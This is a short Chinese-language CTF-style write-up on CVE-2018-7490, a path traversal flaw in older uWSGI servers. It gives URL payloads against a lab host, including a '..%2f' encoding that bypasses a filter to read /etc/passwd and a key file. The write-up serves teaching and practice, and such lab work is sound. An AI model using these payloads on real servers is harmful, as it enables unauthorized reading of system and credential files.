0x01 漏洞详情
uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。uWSGI2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘..’序列的特制URL请求利用该漏洞查看系统上的任意文件。
0x02 漏洞利用
首先访问漏洞地址http://219.153.49.228:47087/
可以看到使用了uWSGI服务器,这个题目的目的就是让我们学会使用cve编号去了解这个漏洞原理,然后利用。我们百度搜索cve-2018-7490
就可以看到网上一些人的文章。攻击者可以使用../路径遍历漏洞读取系统上的任意文件。
payload:http://219.153.49.228:47087/../../../../../etc/passwd
此时按下回车键出现下面的页面
可以看到../
是被过滤了
此时看官方文档https://www.exploit-db.com/exploits/44223
也是告诉我们要使用..%2f的方式来进行攻击,我想原因是因为../
这样的组合会被过滤,所以对/
使用url编码的方式可以绕过。
payload:http://219.153.49.228:47087/..%2f..%2f..%2f..%2fetc/passwd
成功读取,根据提示我们来读取一下根目录的key.txt
payload:http://219.153.49.228:47087/..%2f..%2f..%2f..%2fkey.txt
成功读取到key值。
来源:freebuf.com 2021-03-14 12:49:20 by: tqlyeyu
请登录后发表评论
注册